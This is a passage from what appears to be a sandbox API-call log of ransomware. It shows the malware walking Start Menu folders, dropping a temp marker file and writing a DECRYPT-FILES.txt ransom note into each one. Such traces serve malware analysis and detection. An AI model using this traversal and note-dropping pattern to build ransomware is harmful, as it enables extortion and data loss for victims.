"c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.244] CloseHandle (hObject=0x0) returned 0 [0088.244] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.245] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 1 [0088.245] lstrcmpW (lpString1="Programs", lpString2=".") returned 1 [0088.245] lstrcmpW (lpString1="Programs", lpString2="..") returned 1 [0088.245] lstrcatW (in: lpString1="Programs", lpString2="\\" | out: lpString1="Programs\\") returned="Programs\\" [0088.245] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="Programs\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" [0088.245] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\jkbimi8.tmp") returned 83 [0088.245] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0088.247] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 71 [0088.247] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.247] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\DECRYPT-FILES.txt") returned 89 [0088.247] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0088.247] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.248] CloseHandle (hObject=0x44c) returned 1 [0088.248] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 71 [0088.248] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0088.248] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0088.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.248] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.248] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0088.248] lstrcmpW (lpString1="Accessories", lpString2=".") returned 1 [0088.248] lstrcmpW (lpString1="Accessories", lpString2="..") returned 1 [0088.249] lstrcatW (in: lpString1="Accessories", lpString2="\\" | out: lpString1="Accessories\\") returned="Accessories\\" [0088.249] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Accessories\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" [0088.249] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\jkbimi8.tmp") returned 95 [0088.249] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0088.251] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 83 [0088.251] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.251] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\DECRYPT-FILES.txt") returned 101 [0088.251] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0088.251] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0088.252] CloseHandle (hObject=0x454) returned 1 [0088.252] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 83 [0088.252] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0088.253] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0088.253] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.253] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.253] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.253] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.253] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0088.253] lstrcmpW (lpString1="Accessibility", lpString2=".") returned 1 [0088.253] lstrcmpW (lpString1="Accessibility", lpString2="..") returned 1 [0088.253] lstrcatW (in: lpString1="Accessibility", lpString2="\\" | out: lpString1="Accessibility\\") returned="Accessibility\\" [0088.253] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="Accessibility\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" [0088.253] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\jkbimi8.tmp") returned 109 [0088.253] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0088.256] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 97 [0088.256] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.256] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\DECRYPT-FILES.txt") returned 115 [0088.256] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0088.257] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2d7c8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2d7c8*=0x23fc, lpOverlapped=0x0) returned 1 [0088.258] CloseHandle (hObject=0x45c) returned 1 [0088.258] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 97 [0088.258] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*" [0088.258] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0088.258] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.258] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.258] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.258] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.258] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0cc8cc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.258] lstrcpyW (in: lpString1=0x3f2d7bc, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" [0088.258] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\jkbimi8.tmp" [0088.258] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.258] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.259] CloseHandle (hObject=0x0) returned 0 [0088.259] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.259] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a911c5d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1a98407e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Magnify.lnk", cAlternateFileName="")) returned 1 [0088.259] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" [0088.259] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\jkbimi8.tmp" [0088.259] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.259] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.260] CloseHandle (hObject=0x0) returned 0 [0088.260] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.260] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d655ee8, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d73a72a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notepad.lnk", cAlternateFileName="")) returned 1 [0088.260] lstrcatW (in: lpString1="System Tools", lpString2="\\" | out: lpString1="System Tools\\") returned="System Tools\\" [0088.260] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="System Tools\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" [0088.260] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\jkbimi8.tmp") returned 108 [0088.260] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0088.262] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 96 [0088.262] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.262] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\DECRYPT-FILES.txt") returned 114 [0088.262] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0088.263] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2d7c8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2d7c8*=0x23fc, lpOverlapped=0x0) returned 1 [0088.264] CloseHandle (hObject=0x45c) returned 1 [0088.264] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 96 [0088.264] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*" [0088.264] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0088.264] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.264] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.264] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.264] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.264] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ddd71ea, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0d0d6f, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="computer.lnk", cAlternateFileName="")) returned 1 [0088.264] lstrcpyW (in: lpString1=0x3f2d7bc, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" [0088.264] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\jkbimi8.tmp" [0088.264] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.264] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.265] CloseHandle (hObject=0x0) returned 0 [0088.265] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.265] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d3d87bb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, 